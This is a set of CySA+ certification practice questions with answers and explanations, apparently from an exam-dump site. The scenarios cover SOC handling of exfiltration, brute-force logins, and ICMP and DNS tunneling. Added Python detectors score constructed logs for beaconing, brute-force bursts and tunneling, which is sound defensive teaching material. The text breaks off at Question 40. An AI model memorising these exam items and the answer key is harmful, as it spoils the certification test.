CompTIA CS0-003 CySA+ Exam Dumps and Practice Test Questions Set 3 Q31-45


Question 31

A SOC analyst observes that a database server is sending encrypted outbound traffic to an external IP address at irregular intervals. The connections originate from the SQL server process, which has not been updated recently. No unusual CPU or memory usage is observed. What is the most likely explanation, and what should the analyst do first?

A) The database is performing routine replication to a backup server; allow traffic.
B) The SQL server may be compromised and is exfiltrating sensitive data; capture network traffic and analyze the process.
C) The encrypted traffic is normal encryption for internal database queries; no action is required.
D) An antivirus update is downloading signatures; verify update server information.

Answer: B)

Explanation:

Option A describes routine replication to a backup server. While database replication can generate outbound encrypted traffic, such replication is typically predictable, occurs to known internal or cloud backup endpoints, and usually follows scheduled intervals. In this scenario, traffic is sent to an external IP with irregular intervals, which is inconsistent with standard replication patterns. Assuming the traffic is legitimate without verification risks missing malicious activity and potential data exfiltration. Relying solely on normal operational behavior can lead to undetected breaches, which may compromise sensitive database records.

Option B reflects the correct assessment. Compromised SQL servers can be leveraged to exfiltrate data to external hosts. Attackers often exploit unpatched database servers, leveraging administrative privileges to extract sensitive information without triggering obvious system performance anomalies. Encrypted outbound traffic makes detection more challenging because standard inspection tools may not decrypt the payload. The analyst’s priority should be to capture the traffic for analysis while preserving the integrity of the database server for forensic evaluation. Monitoring the SQL process can reveal unusual queries, timing patterns, or modifications in stored procedures used to extract and transmit data. Correlating network traffic with endpoint telemetry and SIEM alerts can help identify whether the activity is isolated or part of a broader compromise. Once captured, analysts can decode the traffic if possible, identify the scope of potential data loss, and determine whether lateral movement has occurred. Containment may include blocking the external IP at the firewall or segmentation until the investigation is complete. Additionally, reviewing patch history and configuration compliance ensures that any vulnerabilities exploited for compromise are remediated. This approach allows evidence preservation, containment of active threats, and targeted mitigation without unnecessarily disrupting operations.

Option C suggests that encrypted outbound traffic is normal for internal queries. While encryption is common for client-to-server and server-to-server database communication, such encryption usually occurs over specific ports and predictable destinations within the enterprise or approved cloud environments. Traffic to an external IP with irregular timing and no documented business purpose should be treated as suspicious until proven otherwise. Treating it as normal could result in sensitive data being exfiltrated undetected.

Option D proposes that the traffic is related to antivirus signature updates. Antivirus updates generally connect to trusted vendor domains or cloud infrastructure at predictable intervals. Traffic originating from the SQL server process is not typical behavior for antivirus software. Assuming this is the case without verification could result in the compromise persisting unnoticed.

The reasoning for selecting option B is based on several critical observations. First, irregular outbound encrypted traffic to an external IP from a high-value target like a database server is inherently suspicious, particularly when originating from the primary database process. Second, the SQL server has not been recently updated, presenting a likely attack surface for exploitation. Third, the absence of CPU or memory anomalies is consistent with sophisticated attackers using stealthy methods, such as low-volume exfiltration, to avoid detection. Analysts must treat these indicators as potential compromise signals and prioritize evidence collection, traffic analysis, and endpoint inspection. Memory and process inspection, coupled with packet capture and decryption if feasible, will allow the team to understand the scope of the exfiltration and identify compromised accounts, stored procedures, or malicious scripts. Coordination with network and endpoint teams ensures that containment actions do not disrupt legitimate business operations unnecessarily while addressing the immediate threat.

In conclusion, the most appropriate response involves identifying and isolating potential compromise, capturing relevant traffic, analyzing process behavior, and coordinating containment while ensuring evidence preservation. This systematic approach mitigates the risk of data loss, prevents lateral spread, and provides actionable information for remediation and future monitoring.

Question 32

A security analyst observes that several endpoints are performing repeated authentication attempts to network file shares using service accounts during off-hours. The attempts fail due to incorrect credentials, and the source IPs rotate among internal subnets. What is the most likely cause, and what is the recommended response?

A) Normal credential caching attempts by users; ignore the activity.
B) An internal brute-force attack targeting service accounts; analyze authentication logs and enforce account lockout policies.
C) Scheduled backup jobs attempting network access; verify configuration.
D) Temporary network misconfiguration causing retries; correct network settings.

Answer: B)

Explanation:

Option A posits normal credential caching by users. While operating systems may retry cached credentials after a password change, this behavior is typically localized to the user’s endpoint and is limited in scope. The scenario describes repeated failures targeting service accounts across multiple subnets, which is inconsistent with routine user behavior. Ignoring this activity could allow unauthorized access to service accounts and potentially privileged systems, which represents a high-risk scenario.

Option B is the correct assessment. Internal brute-force attacks targeting service accounts often involve repeated login attempts with different credentials or combinations across multiple endpoints. The rotation of source IPs among internal subnets indicates attempts to bypass account lockout policies and avoid detection thresholds in centralized logging systems. Analysts should prioritize reviewing authentication logs to determine the scope of attempted attacks, identify affected accounts, and monitor for successful logins. Enforcement of account lockout policies for service accounts, review of password strength, and enabling multifactor authentication are essential to prevent compromise. Network segmentation and anomaly detection rules may also help contain internal attacks by isolating endpoints exhibiting suspicious authentication patterns. Correlating this activity with SIEM alerts and endpoint telemetry ensures that no lateral movement or exploitation occurs.

Option C suggests that scheduled backup jobs are attempting network access. Backup services usually operate under a dedicated account, connect to well-known endpoints, and follow a defined schedule. The observed behavior—failed logins, rotation across subnets, and off-hours timing—does not match legitimate backup activity. Assuming this is routine could result in an unnoticed internal compromise.

Option D implies that a temporary network misconfiguration is causing retries. While misconfigurations can cause authentication errors, the widespread and repeated nature of the failed attempts across multiple service accounts and subnets indicates deliberate behavior rather than a temporary networking issue. Correcting network settings alone would not prevent potential brute-force attacks.

The rationale for selecting option B involves several factors. First, the activity targets service accounts, which typically have elevated privileges and are attractive to attackers. Second, the failures occur off-hours, suggesting attackers are attempting to exploit periods of low monitoring. Third, the use of multiple internal IPs indicates knowledge of security controls and attempts to circumvent lockouts or anomaly detection thresholds. Immediate response requires a multi-pronged approach: analyzing authentication logs to determine which accounts and subnets are affected, applying account lockouts or temporary credential resets to limit the attack surface, monitoring endpoints for lateral movement attempts, and enhancing detection through SIEM correlation and endpoint monitoring. Remediation also includes reviewing password policies, auditing service account usage, and applying multifactor authentication wherever feasible.

This approach ensures the security team accurately identifies and mitigates internal brute-force threats while preserving evidence and preventing further compromise. Early detection and rapid containment are critical to safeguarding privileged accounts and sensitive resources from unauthorized access.

Question 33

During network monitoring, analysts notice multiple endpoints communicating with an external IP using ICMP with payloads larger than typical ping requests. The communication occurs at consistent intervals over several days. What is the likely cause, and what should the SOC do first?

A) Routine network testing; ignore the traffic.
B) Covert data exfiltration using ICMP tunnels; capture traffic and isolate endpoints.
C) Misconfigured monitoring tools; update monitoring configuration.
D) Standard antivirus heartbeat communication; verify with vendor documentation.

Answer: B)

Explanation:

Option A suggests routine network testing. While ICMP is used for ping and connectivity checks, typical network tests involve short payloads, occur sporadically, and target known endpoints. Large payloads at consistent intervals over several days are not characteristic of standard testing and suggest deliberate, potentially malicious activity. Ignoring this traffic risks allowing covert communication to continue undetected.

Option B is correct. ICMP tunnels are a known method for covert exfiltration or command-and-control communication. Attackers often encapsulate data within ICMP payloads because such traffic frequently bypasses firewall restrictions, monitoring tools, and intrusion detection systems. The persistent, interval-based nature of the communication indicates beaconing, which is consistent with malware trying to maintain contact with an external server while remaining low-profile. Immediate SOC actions should include capturing network traffic for analysis, decoding ICMP payloads to identify transmitted data, and isolating affected endpoints to prevent lateral spread. Identifying the source process on the endpoint is critical to understand persistence and further attack mechanisms. Threat intelligence feeds may help determine whether the external IP is associated with known malware infrastructure. Follow-up actions include deploying firewall or IDS rules to block the malicious host, performing endpoint forensics, and reviewing similar hosts for compromise. Capturing evidence before blocking is essential to preserving forensic integrity and supporting subsequent investigations or legal processes.

Option C posits misconfigured monitoring tools. While monitoring tools can generate ICMP traffic, they are unlikely to produce large payloads with consistent, persistent intervals to unknown external IPs. Assuming misconfiguration without analysis may overlook a real security incident.

Option D suggests standard antivirus heartbeat communication. Antivirus heartbeat communications typically use TCP or UDP on well-known ports to reach vendor infrastructure. ICMP is not a common protocol for signature updates or telemetry reporting, making this explanation improbable.

The reasoning for choosing option B relies on understanding ICMP tunneling behavior, traffic patterns, and endpoint processes. Persistent, interval-based, large-payload ICMP traffic to an external host is a textbook indicator of covert exfiltration or malware beaconing. Capturing and analyzing network traffic while isolating endpoints ensures containment and evidence collection. By mapping the endpoints and processes involved, analysts can identify the malware family, understand the attack vector, and implement targeted remediation measures. ICMP tunneling is particularly stealthy, so early detection and containment prevent sensitive data loss and mitigate risk to other systems.
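The indicators the explanation relies on (consistent intervals, payloads well above a normal ping, many records to one external host) can be scored mechanically. The following is an added example, not code from the original page: it runs simple beacon scoring over constructed ICMP flow records (the hosts, periods and sizes are invented for illustration), computing the coefficient of variation of the inter-packet interval and the mean payload size per source/destination pair.

```python
import statistics
from collections import defaultdict
from datetime import datetime, timedelta


def _regular_flows(src, dst, start, period_s, n, size, jitter_s=0):
    """Build n constructed ICMP records spaced period_s apart, alternating +/- jitter_s."""
    recs, t = [], start
    for i in range(n):
        recs.append((t, src, dst, "icmp", size))
        t += timedelta(seconds=period_s + (jitter_s if i % 2 else -jitter_s))
    return recs


# Constructed flow records for illustration (not a real capture):
# (timestamp, src, dst, protocol, payload_bytes)
T0 = datetime(2024, 3, 1, 0, 0, 0)
SAMPLE_FLOWS = (
    # suspected tunnel: ~5-minute beacon with 1400-byte payloads to an external host
    _regular_flows("10.0.5.12", "203.0.113.8", T0, 300, 12, 1400, jitter_s=5)
    # monitoring probe: just as regular, but with the default 56-byte ping payload
    + _regular_flows("10.0.9.1", "10.0.0.1", T0, 60, 10, 56)
    # a handful of ad-hoc pings from an admin workstation at irregular times
    + [(T0 + timedelta(seconds=s), "10.0.5.40", "10.0.0.1", "icmp", 56)
       for s in (0, 7, 130, 131, 900)]
)


def analyze_flows(records, min_count=8, max_cv=0.15, min_payload=128):
    """Score each (src, dst) pair of ICMP records for beacon-like behaviour.

    A pair is suspicious when it has at least min_count packets, the
    coefficient of variation (stdev / mean) of the inter-packet interval is
    at most max_cv, and the mean payload is at least min_payload bytes.
    Thresholds are assumptions for this example and should be tuned per network.
    """
    by_pair = defaultdict(list)
    for ts, src, dst, proto, size in records:
        if proto == "icmp":
            by_pair[(src, dst)].append((ts, size))

    results = {}
    for pair, items in by_pair.items():
        items.sort()
        times = [t for t, _ in items]
        sizes = [s for _, s in items]
        intervals = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        cv = None
        mean_interval = None
        if len(intervals) >= 2:
            mean_interval = statistics.mean(intervals)
            if mean_interval > 0:
                cv = statistics.pstdev(intervals) / mean_interval
        mean_payload = statistics.mean(sizes)
        suspicious = (
            len(items) >= min_count
            and cv is not None and cv <= max_cv
            and mean_payload >= min_payload
        )
        results[pair] = {
            "count": len(items),
            "mean_interval": mean_interval,
            "cv": cv,
            "mean_payload": mean_payload,
            "suspicious": suspicious,
        }
    return results


def flag_beacons(records, **thresholds):
    """Return the sorted list of (src, dst) pairs that look like ICMP beacons."""
    scored = analyze_flows(records, **thresholds)
    return sorted(p for p, v in scored.items() if v["suspicious"])


if __name__ == "__main__":
    for pair, info in analyze_flows(SAMPLE_FLOWS).items():
        print(pair, info)
    print("beacons:", flag_beacons(SAMPLE_FLOWS))
```

The probe in the sample is as regular as the beacon but is not flagged because of its payload size, which is the distinction the explanation draws between option B and option C.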

Question 34

During routine endpoint monitoring, a SOC analyst discovers that a workstation is executing a script that attempts to disable logging services while simultaneously connecting to multiple external IPs over non-standard TCP ports. No alerts were triggered by the antivirus. What is the most likely scenario, and what should be the immediate response?

A) Legitimate administrative maintenance script; allow execution.
B) Malware attempting to establish persistence and exfiltrate data; isolate the workstation and perform memory and disk forensics.
C) Scheduled system monitoring tool misconfiguration; correct the configuration.
D) Endpoint testing by IT staff; notify staff and approve execution.

Answer: B)

Explanation:

Option A suggests that the activity is a legitimate administrative script. Legitimate administrative scripts typically run under documented accounts, do not attempt to disable logging, and connect only to known destinations using standard ports. The behavior described—disabling logging services and connecting to unknown external IPs over non-standard TCP ports—is inconsistent with legitimate administration and strongly indicates malicious intent. Allowing this activity could result in undetected persistence, data exfiltration, or lateral movement across the network.

Option B reflects the correct assessment. Disabling logging is a classic technique employed by attackers to evade detection. Establishing external connections over non-standard ports suggests attempts to communicate with command-and-control infrastructure, often bypassing traditional firewall rules or intrusion detection alerts. The lack of antivirus detection indicates that the malware is either fileless, obfuscated, or using zero-day techniques. Immediate response requires isolating the affected workstation to prevent further compromise or lateral movement. Memory forensics is critical to capture active in-memory processes, injected code, or PowerShell scripts, while disk forensics identifies persistent artifacts such as scheduled tasks, registry modifications, or startup entries. Network traffic should be captured to identify external destinations, decode payloads, and determine the type of data potentially exfiltrated. Analysts can also cross-reference external IPs with threat intelligence feeds to determine the attacker’s infrastructure, malware family, or tactics, techniques, and procedures (TTPs). Subsequent remediation involves cleaning the endpoint, reviewing similar endpoints for signs of compromise, and enhancing detection capabilities through endpoint monitoring and firewall rules. This response balances containment with evidence preservation and allows for a full understanding of the attack vector, minimizing further risk.

Option C proposes misconfiguration of monitoring tools. Misconfigurations can generate unusual traffic or logs, but they do not typically include attempts to disable logging or connect to unknown external hosts over non-standard ports. Assuming this behavior is benign without investigation could allow an ongoing compromise to persist.

Option D suggests IT testing. IT activities are usually authorized, documented, and performed during scheduled maintenance windows. The obfuscation, stealthy behavior, and network traffic to unknown destinations indicate malicious activity rather than routine testing.

Selecting option B prioritizes early detection and containment of sophisticated malware. Disabling logging combined with non-standard external connections demonstrates an attacker’s intent to evade monitoring and maintain control. Capturing forensic evidence enables analysts to identify the malware, understand the attack chain, and implement targeted remediation measures. This approach ensures that compromised endpoints are effectively isolated while preserving data for post-incident analysis and improving detection for future threats.

Question 35

A network administrator notices several endpoints repeatedly sending HTTP POST requests containing small, encrypted payloads to an unknown external domain. The activity occurs primarily during non-business hours. What is the most likely threat, and what is the recommended immediate action?

A) Routine application telemetry; allow the traffic.
B) Covert data exfiltration via HTTP; capture traffic, isolate endpoints, and analyze payloads.
C) Standard antivirus updates over HTTP; verify vendor update sources.
D) Internal user testing; notify users to stop.

Answer: B)

Explanation:

Option A posits that the activity is routine application telemetry. While applications do send telemetry data, it is generally sent to known vendor endpoints and in predictable intervals. Encrypted payloads, unknown destinations, and timing during non-business hours are not consistent with normal telemetry behavior. Assuming the traffic is benign risks ignoring potential data exfiltration or malware communication.

Option B is correct. Small, encrypted HTTP POST requests to unknown domains are indicative of covert data exfiltration. Attackers often use HTTP to blend with normal web traffic, making detection challenging. Non-business hour activity suggests attempts to evade monitoring and capture sensitive data without drawing attention. Immediate SOC response includes isolating affected endpoints to prevent further exfiltration, capturing network traffic for analysis, and decoding payloads to determine the type of data being transmitted. Endpoint analysis can identify processes responsible for initiating the traffic, uncover malware persistence mechanisms, and allow remediation. Blocking the external domain and updating intrusion detection signatures helps prevent recurrence. Cross-referencing threat intelligence sources can provide context on the external domain, including whether it is part of a known attacker infrastructure or botnet. Containment while maintaining evidence ensures both operational continuity and forensic readiness.

Option C assumes standard antivirus updates. Antivirus vendors generally distribute updates via trusted domains or cloud services using standard HTTPS connections. Unknown domains and encrypted payloads over HTTP suggest malicious behavior rather than legitimate antivirus activity.

Option D implies internal testing. User testing would typically be limited to a small number of endpoints, involve known domains, and be documented. The described widespread, off-hour activity with encrypted payloads is inconsistent with routine internal testing.

The reasoning behind choosing option B involves multiple indicators: timing, encryption, unknown external destinations, and the method of communication (HTTP POST). These factors collectively point toward covert exfiltration attempts. Capturing network traffic and analyzing endpoint processes allows analysts to understand the nature of the threat, the scope of data compromise, and attacker TTPs. Isolation ensures that the compromise does not spread while evidence is preserved. Subsequent remediation involves cleaning infected endpoints, blocking malicious traffic, applying patches, and strengthening monitoring for similar activities. Proactive detection and containment are critical to mitigating risk and preventing sensitive data loss.

Question 36

A SOC analyst observes unusual lateral movement activity within the network: multiple endpoints are accessing shared directories using previously unused administrative accounts. Access attempts include copying small files repeatedly and occur outside normal business hours. What is the most likely scenario, and what should the analyst do first?

A) Routine file synchronization; allow activity.
B) Internal reconnaissance by malware or compromised accounts; monitor and isolate affected hosts while reviewing logs.
C) Backup jobs misconfigured; correct schedules.
D) Users performing legitimate off-hours tasks; notify users.

Answer: B)

Explanation:

Option A suggests routine file synchronization. File synchronization typically involves predictable intervals, known accounts, and known endpoints. Observing new administrative accounts being used for repeated small file access outside business hours indicates unusual behavior inconsistent with normal operations. Ignoring this activity could allow malware to perform lateral reconnaissance and exfiltration.

Option B reflects the correct assessment. The use of previously unused administrative accounts, off-hours activity, and repeated small file transfers are classic indicators of malware performing internal reconnaissance to map network resources and gather data. Initial response should involve monitoring network traffic, isolating affected hosts to prevent further lateral movement, and reviewing access logs for both endpoints and shared directories. Determining which accounts are compromised, assessing the files accessed, and correlating with SIEM alerts or endpoint telemetry helps in understanding the scope of the compromise. Forensic analysis may uncover malware persistence mechanisms, such as scheduled tasks or injected processes. Containment and remediation prevent further spread while preserving evidence for investigation. Following containment, updating account management policies, enforcing multifactor authentication, and auditing administrative account use ensure similar attacks are detected and mitigated in the future.

Option C suggests misconfigured backup jobs. Backup processes usually operate under known accounts, at documented intervals, and often involve larger file transfers. Repeated small file access with new administrative accounts outside normal schedules is inconsistent with backup behavior. Treating it as a backup misconfiguration risks missing an active compromise.

Option D implies legitimate user activity. Off-hours tasks using previously unused administrative accounts are highly unlikely to be normal and require verification. Assuming legitimacy could result in overlooked malicious activity and compromise of critical assets.

The rationale for selecting option B centers on recognizing behavioral indicators of compromise: new accounts, off-hours access, repeated small file transfers, and lateral movement patterns. Prompt containment, monitoring, and log review allow analysts to identify the root cause, scope of compromise, and preventive measures. This approach ensures network security while minimizing operational disruption.

Question 37

A security analyst observes that several endpoints are making outbound HTTPS connections to a newly registered domain with no associated reputation. The endpoints are sending small, encrypted payloads at irregular intervals. No other network activity is present from these hosts. What is the most likely threat, and what should the SOC do first?

A) Normal application updates; allow traffic.
B) Malware establishing a command-and-control (C2) channel; capture network traffic, isolate endpoints, and analyze payloads.
C) Antivirus updates from a new vendor; verify update source.
D) User-initiated cloud file uploads; notify users.

Answer: B)

Explanation:

Option A suggests normal application updates. Legitimate updates are usually sent to well-known vendor domains and occur at predictable intervals. Random, small, encrypted payloads sent to newly registered, low-reputation domains are inconsistent with routine updates. Ignoring this could allow attackers to maintain covert control.

Option B is correct. Small, encrypted, outbound HTTPS traffic to a newly registered domain is a strong indicator of malware establishing a C2 channel. Irregular intervals suggest the malware is using beaconing techniques to evade detection. The immediate action should be to capture network traffic for forensic analysis to identify what data, if any, is being exfiltrated. Isolating endpoints prevents lateral movement or further external communication. Payload analysis helps determine malware type and potential infection vector. Analysts should also cross-reference the external domain with threat intelligence sources to identify related campaigns or infrastructure. Additionally, reviewing endpoint processes and running services can reveal persistence mechanisms, unauthorized scripts, or injected code. Following isolation and analysis, remediation involves removing malware, updating detection rules, and monitoring other endpoints for similar behavior. This approach balances containment, evidence preservation, and operational continuity.

Option C proposes antivirus updates from a new vendor. Antivirus updates generally occur for known vendor URLs, not newly registered domains. Encrypted payloads over HTTPS from endpoints with no other network activity make this explanation improbable.

Option D implies user-initiated cloud uploads. Legitimate user uploads are typically predictable, occur via known services, and do not employ irregular encrypted payloads to unknown domains. Assuming benign behavior without analysis risks allowing persistent malware communication.

The rationale for selecting option B is based on behavioral indicators: newly registered domains, encrypted outbound traffic, irregular intervals, and lack of other activity. Capturing and analyzing traffic while isolating affected endpoints ensures containment and forensic integrity. Identification of malware type and C2 communication allows targeted remediation, mitigation of further compromise, and strengthening of detection capabilities. Early intervention prevents data loss, lateral spread, and long-term persistence in the network.

Question 38

A SOC team observes repeated failed RDP login attempts across multiple Windows servers. The attempts originate from multiple IP addresses outside the organization and target accounts with administrative privileges. What is the most likely threat, and what should the immediate action be?

A) Routine failed logins; ignore activity.
B) External brute-force attack targeting administrative accounts; implement IP blocking, enforce account lockout policies, and enable multi-factor authentication.
C) User misremembering credentials; notify users.
D) Misconfigured monitoring system; adjust logging thresholds.

Answer: B)

Explanation:

Option A suggests routine failed logins. While failed logins occur normally, multiple external IPs targeting administrative accounts simultaneously, especially from outside the organization, indicate a coordinated attack rather than normal behavior. Ignoring such activity exposes critical accounts to compromise.

Option B is correct. Repeated failed RDP logins from external IPs targeting administrative accounts represent an external brute-force attack. Attackers often attempt to gain access by guessing passwords or leveraging leaked credentials. Immediate action should include blocking the attacking IPs at the firewall, enforcing account lockout policies to prevent repeated guessing, and enabling multi-factor authentication (MFA) to add a layer of security. Reviewing server logs and SIEM alerts helps identify potentially compromised accounts or endpoints. Analysts should also examine authentication patterns for any signs of successful compromise or lateral movement attempts. By correlating IPs with threat intelligence sources, the SOC can determine if the attack is part of a known botnet or threat campaign.

Option C suggests user misremembering credentials. While possible, the scale and pattern—multiple servers, multiple IPs, administrative accounts—make this explanation highly unlikely. Treating it as a benign user error could allow attackers to successfully gain access.

Option D proposes misconfigured monitoring systems. Incorrect logging settings do not generate actual login attempts; the observed pattern reflects genuine authentication activity. Assuming misconfiguration without investigation risks overlooking an ongoing attack.

The reasoning for choosing option B emphasizes the severity of attacks targeting administrative accounts. Early containment through IP blocking and MFA enforcement mitigates risk while forensic analysis ensures accurate assessment of any compromise. Addressing the threat promptly prevents unauthorized access, protects sensitive systems, and strengthens security controls against future attacks.
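Both Question 32 (internal source IPs rotating across subnets against service accounts) and Question 38 (external IPs against administrative RDP accounts) describe the same log pattern: many failures against one account from many sources inside a short window. The following is an added example, not code from the original page: it aggregates constructed authentication log lines (the users, addresses and timestamps are invented) per target account in a sliding window, counts distinct sources, labels the origin internal or external against the RFC 1918 ranges, and notes whether the burst fell entirely outside business hours.

```python
import ipaddress
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log lines (not from any real system):
# "<date> <time> <event> user=<account> src=<ip> service=<name>"
SAMPLE_LOG = """\
2024-03-02 02:14:05 AUTH_FAIL user=svc_backup src=10.10.1.23 service=smb
2024-03-02 02:14:09 AUTH_FAIL user=svc_backup src=10.10.2.41 service=smb
2024-03-02 02:14:12 AUTH_FAIL user=svc_backup src=10.10.3.7 service=smb
2024-03-02 02:14:20 AUTH_FAIL user=svc_backup src=10.10.1.23 service=smb
2024-03-02 02:14:33 AUTH_FAIL user=svc_sql src=10.10.2.41 service=smb
2024-03-02 02:14:40 AUTH_FAIL user=svc_sql src=10.10.4.19 service=smb
2024-03-02 02:14:51 AUTH_FAIL user=svc_sql src=10.10.5.66 service=smb
2024-03-02 02:15:02 AUTH_FAIL user=svc_sql src=10.10.3.7 service=smb
2024-03-02 03:01:10 AUTH_FAIL user=Administrator src=203.0.113.45 service=rdp
2024-03-02 03:01:14 AUTH_FAIL user=Administrator src=198.51.100.9 service=rdp
2024-03-02 03:01:19 AUTH_FAIL user=Administrator src=203.0.113.77 service=rdp
2024-03-02 03:01:25 AUTH_FAIL user=Administrator src=198.51.100.9 service=rdp
2024-03-02 03:01:31 AUTH_FAIL user=Administrator src=192.0.2.200 service=rdp
2024-03-02 09:30:00 AUTH_FAIL user=jsmith src=10.10.1.50 service=smb
2024-03-02 09:30:06 AUTH_OK user=jsmith src=10.10.1.50 service=smb
"""

# RFC 1918 ranges; ipaddress.is_private is deliberately not used because it also
# treats the documentation ranges used in the sample (203.0.113.0/24 etc.) as private.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def is_internal(ip):
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def is_off_hours(ts, start_hour=7, end_hour=19):
    """Assumed business window of 07:00-19:00; adjust to the organisation."""
    return ts.hour < start_hour or ts.hour >= end_hour


def parse_line(line):
    parts = line.split()
    ts = datetime.strptime(parts[0] + " " + parts[1], "%Y-%m-%d %H:%M:%S")
    fields = dict(p.split("=", 1) for p in parts[3:])
    return {"ts": ts, "event": parts[2], "user": fields["user"],
            "src": fields["src"], "service": fields.get("service", "")}


def parse_log(text):
    return [parse_line(l) for l in text.splitlines() if l.strip()]


def detect_bruteforce(events, window=timedelta(minutes=10), min_fail=4, min_sources=3):
    """Per target account, find the densest window with >= min_fail failures
    from >= min_sources distinct source addresses. Thresholds are assumptions."""
    by_user = defaultdict(list)
    for e in events:
        if e["event"] == "AUTH_FAIL":
            by_user[e["user"]].append(e)

    findings = {}
    for user, evs in by_user.items():
        evs.sort(key=lambda e: e["ts"])
        start = 0
        for end in range(len(evs)):
            # slide the window start forward until the span fits inside `window`
            while evs[end]["ts"] - evs[start]["ts"] > window:
                start += 1
            chunk = evs[start:end + 1]
            sources = {e["src"] for e in chunk}
            if len(chunk) < min_fail or len(sources) < min_sources:
                continue
            if user in findings and findings[user]["failures"] >= len(chunk):
                continue  # keep the largest qualifying burst per account
            external = sorted(s for s in sources if not is_internal(s))
            findings[user] = {
                "failures": len(chunk),
                "sources": sorted(sources),
                "external_sources": external,
                "origin": "external" if external else "internal",
                "off_hours": all(is_off_hours(e["ts"]) for e in chunk),
                "services": sorted({e["service"] for e in chunk}),
            }
    return findings


if __name__ == "__main__":
    for user, info in detect_bruteforce(parse_log(SAMPLE_LOG)).items():
        print(user, info)
```

A single failure followed by a success (jsmith in the sample) never qualifies, which is the ordinary mistyped-password case that options A and C of both questions describe.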

Question 39

During threat hunting, analysts identify endpoints with unusually high volumes of DNS requests to non-corporate domains. Many queries contain extremely long subdomains, and some responses appear encoded. What is the most likely cause, and what immediate steps should be taken?

A) Normal DNS lookups; no action required.
B) DNS tunneling used for covert data exfiltration; monitor traffic, capture payloads, and isolate affected hosts.
C) Misconfigured internal DNS server; update server configuration.
D) Routine antivirus DNS queries; verify vendor documentation.

Answer: B)

Explanation:

Option A suggests normal DNS lookups. Typical DNS queries involve standard domain names with predictable structures. Extremely long subdomains and encoded responses deviate from normal behavior, particularly when originating from multiple endpoints, indicating anomalous activity. Assuming the activity is normal risks missing potential data exfiltration.

Option B is correct. DNS tunneling is a common method attackers use to exfiltrate data or maintain command-and-control channels. Large or encoded payloads embedded in subdomain requests allow sensitive information to bypass traditional firewall and IDS protections. Immediate response involves capturing network traffic for analysis, isolating affected endpoints, and decoding payloads to determine the type of data transmitted. Reviewing endpoint telemetry and identifying the processes generating the DNS traffic helps uncover malware persistence mechanisms. Analysts should also cross-reference domains with threat intelligence to identify known malicious infrastructure. Containment may include blocking malicious domains at DNS servers and updating security controls to detect future tunneling attempts. Detailed forensic evidence is preserved to understand the attack methodology and inform remediation actions.

Option C suggests misconfigured DNS servers. Misconfigurations typically cause failed lookups or delays, not persistent, high-volume encoded queries. Treating this as a misconfiguration would fail to detect ongoing exfiltration.

Option D proposes routine antivirus queries. While some antivirus solutions query domains, such queries are generally predictable, directed at known vendor domains, and not encoded. Assuming benign activity may allow persistent compromise.

Choosing option B ensures detection and mitigation of sophisticated exfiltration techniques. Early capture and analysis allow understanding of the attack scope, identification of affected endpoints, and strengthening of security controls to prevent recurrence.
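The traits the question lists (high query volume, extremely long subdomains, encoded-looking labels) map directly onto per-source, per-domain statistics. The following is an added example, not code from the original page: it parses constructed DNS query log lines (the hosts and domains are invented, and the long labels are generated hex so the sample is reproducible), then scores each source/domain pair on average subdomain length, character entropy and the share of never-repeated subdomains. Splitting the registered domain as the last two labels is a simplification; a production rule would use the public suffix list.

```python
import hashlib
import math
from collections import defaultdict


def shannon_entropy(s):
    """Bits of entropy per character over the string's own symbol distribution."""
    if not s:
        return 0.0
    counts = {}
    for ch in s:
        counts[ch] = counts.get(ch, 0) + 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def split_name(qname):
    """Return (subdomain, registered_domain); registered domain assumed to be the last two labels."""
    labels = qname.rstrip(".").split(".")
    if len(labels) <= 2:
        return "", ".".join(labels)
    return ".".join(labels[:-2]), ".".join(labels[-2:])


def parse_dns_log(text):
    """Constructed line format: '<iso-timestamp> <src-ip> <qname> <qtype>'."""
    out = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, qname, qtype = line.split()
        out.append({"ts": ts, "src": src, "qname": qname.lower(), "qtype": qtype})
    return out


def score_queries(records, min_queries=5, min_avg_sub_len=30,
                  min_entropy=3.0, min_unique_ratio=0.8):
    """Flag (src, domain) pairs whose subdomains look like encoded data carriers.
    Thresholds are assumptions for this example and need tuning per environment."""
    groups = defaultdict(list)
    for r in records:
        sub, dom = split_name(r["qname"])
        groups[(r["src"], dom)].append((sub, r["qtype"]))

    findings = {}
    for key, items in groups.items():
        subs = [s for s, _ in items]
        n = len(subs)
        avg_len = sum(len(s) for s in subs) / n
        avg_entropy = sum(shannon_entropy(s.replace(".", "")) for s in subs) / n
        unique_ratio = len(set(subs)) / n
        txt_share = sum(1 for _, q in items if q in ("TXT", "NULL", "CNAME")) / n
        flagged = (n >= min_queries and avg_len >= min_avg_sub_len
                   and avg_entropy >= min_entropy and unique_ratio >= min_unique_ratio)
        findings[key] = {"queries": n, "avg_subdomain_len": avg_len,
                         "avg_entropy": avg_entropy, "unique_ratio": unique_ratio,
                         "txt_share": txt_share, "flagged": flagged}
    return findings


def _hex_chunk(i):
    # constructed stand-in for an encoded data chunk: 64 hex characters
    return hashlib.sha256(f"constructed-chunk-{i}".encode()).hexdigest()


# Constructed sample: ordinary lookups from one host, tunnel-shaped queries from another.
_NORMAL = [("10.0.7.33", "www.example.com", "A"), ("10.0.7.33", "mail.example.com", "A"),
           ("10.0.7.33", "api.example.com", "A"), ("10.0.7.33", "www.example.com", "A"),
           ("10.0.7.33", "cdn.example.com", "AAAA"), ("10.0.7.33", "www.example.com", "A")]
# DNS labels are capped at 63 bytes, so each 64-char chunk is split across two labels.
_TUNNEL = [("10.0.7.44", f"{_hex_chunk(i)[:32]}.{_hex_chunk(i)[32:]}.tunnel-example.net", "TXT")
           for i in range(8)]
SAMPLE_DNS_LOG = "\n".join(f"2024-03-01T10:00:{i:02d} {src} {q} {t}"
                           for i, (src, q, t) in enumerate(_NORMAL + _TUNNEL)) + "\n"


if __name__ == "__main__":
    for key, info in score_queries(parse_dns_log(SAMPLE_DNS_LOG)).items():
        print(key, info)
```

The "txt_share" field is reported but not used in the verdict; record types such as TXT and NULL carry more bytes per answer and are a useful secondary signal once the length and entropy rule has fired.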

Question 40

A SOC analyst notices a Linux server executing scripts that download files from untrusted sources and run them directly in memory without writing to disk. No alerts are triggered by endpoint security. What type of threat does this indicate, and what is the recommended response?

